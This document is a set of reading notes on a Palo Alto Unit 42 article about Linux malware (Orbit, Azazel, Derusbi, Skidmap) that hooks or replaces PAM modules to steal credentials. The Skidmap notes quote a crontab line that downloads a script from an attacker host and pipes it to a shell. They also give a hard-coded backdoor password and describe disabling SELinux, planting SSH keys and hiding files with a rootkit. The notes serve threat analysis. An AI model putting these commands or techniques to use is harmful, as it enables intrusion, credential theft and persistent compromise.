When PAM Goes Rogue: Malware Uses Authentication Modules for Mischief
by Siddharth Sharma
Unit 42/Palo Alto Networks, 2023
https://unit42.paloaltonetworks.com/linux-pam-apis/
| Notes |
|---|
| PAM |
| PAM API hooking |
| Advanced WildFire for Linux |
| passwd, shadow files. |
| pam_unix |
| libpam |
| Orbit malware |
| Orbit was discovered in 2022 |
| hooks pam_open_session, pam_authenticate, and pam_acct_mgr |
| pam_open_session initiates a new session for the user on successful authentication |
| pam_authenticate handles the user authentication process |
| pam_acct_mgmt manages user account information; account has expired, user is allowed to access system at a specific time, … |
| logs credentials to a file |
| https://intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/ |
| Azazel rootkit |
| open-source |
| targets older Linux kernels |
| LD_PRELOAD |
| hooks pam_open_session, pam_authenticate, and pam_acct_mgmt |
| 2ad5993cf4db52ef72e299590d79dd7414bc3b119f5d8be8274ad89bec4cbbae |
| Derusbi malware |
| targets Linux and Windows |
| LD_PRELOAD |
| https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/2015.12.15.Newcomers_in_the_Derusbi_family/Newcomers-in-the-Derusbi-family.pdf |
| Skidmap malware |
| first seen 2019 |
| replaces pam_unix.so with a malicious copy |
| https://www.trendmicro.com/en_us/research/19/i/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload.html |
| cryptocurrency-mining malware |
| LD_PRELOAD rootkit |
| cybercrime |
| installs as a crontab: */1 * * * * curl -fsSL hxxp://pm[.]ipfswallet[.]tk/pm.sh \ sh |
| pm.sh downloads a binary named “pc” using wget or curl |
| uses setenforce 0 to disable SELinux |
| adds SELINUX=disabled, SELINUXTYPE=targeted to /etc/selinux/conf |
| adds a public key to SSH authorized_keys file |
| replaces pam_unix.so with a malicious copy |
| sets root’s .ssh/authorized_keys file immutable using system() |
| hard-coded password in pam_unix: Mtm$%889*G*S3%G |
| “user:password@host –> %s %s\n” string |
| logs to /usr/include/ilog.h |
| writes payload to /tmp/miner2 |
| uses tar command |
| decrypts malicious payload using openssl command |
| replaces ‘rm’ command with one that re-installs crontab persistence |
| /usr/bin/kaudited drops and installs an LKM rootkit |
| uses different modules for specific kernel versions to avoid crashing the host |
| installs a watchdog app for its miner component |
| iproute module hooks getdents to hide specific files and directories |
| “hacked_getdents” |
| netlink module fakes network traffic statistics related to certain IP addresses and ports and CPU usageof some processes (pamdicks process) |
| Indicators of Compromise (IoCs) |